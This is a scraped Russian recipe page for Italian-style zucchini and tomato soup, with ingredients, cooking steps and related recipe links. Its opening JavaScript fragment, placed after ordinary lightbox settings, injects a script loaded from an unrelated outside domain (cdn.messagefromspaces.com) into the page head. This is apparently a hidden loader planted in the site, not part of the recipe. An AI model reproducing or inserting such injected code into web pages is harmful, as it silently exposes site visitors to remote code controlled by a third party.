, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Суп из кабачков по-итальянски


DSCF5947Это очень простой и очень вкусный суп! Казалось бы, что особенного можно приготовить из кабачков и помидоров…А мне кажется, что это особенное блюдо.

Что и сколько берем:

1. Помидоры — 5-6 шт. (больших и мягких)

2. Кабачки — 1 шт. (желательно молоденькие)

3. Чеснок — 3/4 зубка

4. Смесь «Травы итальянской кухни», или просто орегано

 

Начинаем готовить:

Сначала кладем помидоры в кипяток, чтобы потом легко снять кожуру. Естественно, ее снимаем и рубим ножом очень очень мелко (до консистенции каши). Все это перекладываем в кастрюлю и ставим ее на медленый огонь потомиться.

Теперь нарезаем кабачки: сначала пополам и потом  тонкими ломтиками. Можно и четвертинками. Быстро обжариваем на оливковом масле (на сильном огне),  чтобы кусочки поджарились. Затем добавляем их к томящимся помидорам, солим и перчим по вкусу.

Густоту супа, кстати, тоже регулируем сами. Можно подлить воды, т.к. с непревычки суп может показаться густоватым. Даем потомиться супу еще минутки 3-4 и, выключив огонь, добавляем нарезанный тонкими ломтиками и хорошо обжаренный чеснок и травки.

Желательно дать супу настояться минут 30 и приятного аппетита!

На эту тему вы можете почитать:

Щи из савойской капусты с хренком
Суп из свежего гороха
Фасолевый суп

Тэги: , , ,



Добавить комментарий